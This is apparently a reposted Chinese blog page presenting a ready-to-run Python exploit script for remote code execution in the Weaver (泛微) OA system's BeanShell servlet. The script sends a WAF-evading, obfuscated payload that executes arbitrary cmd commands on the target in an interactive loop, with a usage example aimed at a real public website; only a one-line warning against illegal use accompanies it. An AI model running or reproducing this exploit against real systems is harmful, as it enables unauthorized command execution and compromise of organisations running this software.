泛微OA管理系统RCE漏洞利用脚本 ——yzddMr6

使用方法

python3 rce.py http://www.baidu.com

泛微OA管理系统RCE漏洞利用脚本 ——yzddMr6_第1张图片
image

payload是捡的,可以一定程度上bypass waf

源码

随手撸的

import requests
import sys

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Content-Type': 'application/x-www-form-urlencoded'
}


def exploit(url,cmd):
    target=url+'/weaver/bsh.servlet.BshServlet'
    payload='bsh.script=eval%00("ex"%2b"ec(\\"cmd+/c+{}\\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw'.format(cmd)
    res=requests.post(url=target,data=payload,headers=headers,timeout=10)
    res.encoding=res.apparent_encoding
    print(res.text)

if __name__ == '__main__':
    url=sys.argv[1]
    while(1):
        cmd=input('cmd:')
        exploit(url,cmd)

警告!请勿用于非法用途!

你可能感兴趣的:(泛微OA管理系统RCE漏洞利用脚本 ——yzddMr6)